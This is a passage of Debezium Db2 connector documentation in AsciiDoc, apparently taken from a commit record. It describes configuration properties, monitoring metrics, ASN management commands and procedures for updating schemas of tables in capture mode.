`inventory-connector` starts.\n\n.. Display the Kafka Connect log output:\n+\n[source,shell,options=\"nowrap\"]\n----\noc logs $(oc get pods -o name -l strimzi.io\/name=my-connect-cluster-connect)\n----\n\n.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:\n+\n[source,shell,options=\"nowrap\"]\n----\n... INFO Starting snapshot for ...\n... INFO Snapshot is using user 'debezium' ...\n----\n\nendif::product[]\n\n.Results\n\nWhen the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for. The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.\n\n\/\/ Type: reference\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-configuration-properties\n\/\/ Title: Description of {prodname} Db2 connector configuration properties\n[[db2-connector-properties]]\n=== Connector properties\n\nThe {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:\n\n* xref:db2-required-configuration-properties[Required configuration properties]\n* xref:db2-advanced-configuration-properties[Advanced configuration properties]\n* xref:db2-pass-through-properties[Pass-through configuration properties]\n\n[id=\"db2-required-configuration-properties\"]\nThe following configuration properties are _required_ unless a default value is available.\n\n.Required connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-name]]<<db2-property-name, `+name+`>>\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.\n\n|[[db2-property-connector-class]]<<db2-property-connector-class, `+connector.class+`>>\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.\n\n|[[db2-property-tasks-max]]<<db2-property-tasks-max, `+tasks.max+`>>\n|`1`\n|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|[[db2-property-database-hostname]]<<db2-property-database-hostname, `+database.hostname+`>>\n|\n|IP address or hostname of the Db2 database server.\n\n|[[db2-property-database-port]]<<db2-property-database-port, `+database.port+`>>\n|`50000`\n|Integer port number of the Db2 database server.\n\n|[[db2-property-database-user]]<<db2-property-database-user, `+database.user+`>>\n|\n|Name of the Db2 database user for connecting to the Db2 database server.\n\n|[[db2-property-database-password]]<<db2-property-database-password, `+database.password+`>>\n|\n|Password to use when connecting to the Db2 database server.\n\n|[[db2-property-database-dbname]]<<db2-property-database-dbname, `+database.dbname+`>>\n|\n|The name of the Db2 database from which to stream the changes\n\n|[[db2-property-database-server-name]]<<db2-property-database-server-name, `+database.server.name+`>>\n|\n|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name. The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.\n\n|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `+database.history.kafka.topic+`>>\n|\n|The full name of the Kafka topic where the connector stores the database schema history.\n\n|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `+database.history.kafka.bootstrap.servers+`>>\n|\n|A list of host\/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.\n\n|[[db2-property-table-include-list]]<<db2-property-table-include-list, `+table.include.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.\n\n|[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `+table.exclude.list+`>>\n|\n|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.\n\n|[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `+column.exclude.list+`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.\nFully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.\nPrimary key columns are always included in the event's key, even if they are excluded from the value.\n\n|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +\n +\nBased on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash value is automatically shortened to the length of the column. +\n +\nYou can specify multiple instances of this property with different algorthims and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +\n +\nwhere `CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value may not be completely masked.\n\n|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision: +\n +\n`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\n +\n`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which uses millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].\n\n|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n| Controls whether a tombstone event should be generated after a _delete_ event. +\n +\n`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is sent. +\n +\nAfter a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.\n\n|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.\n\n|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.\n\n|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. +\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. This marks the old change-data tables as inactive, which allows the data in them to remain but they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\n[NOTE]\n====\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS.\nTo use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product.\nHowever, IIDR does not need to be installed.\n====\n\nifdef::community[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nIt is expected that the connector would also work on other platforms such as Windows,\nand we'd love to get your feedback if you can confirm this to be the case.\nendif::community[]\n\nifdef::product[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nendif::product[]\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and 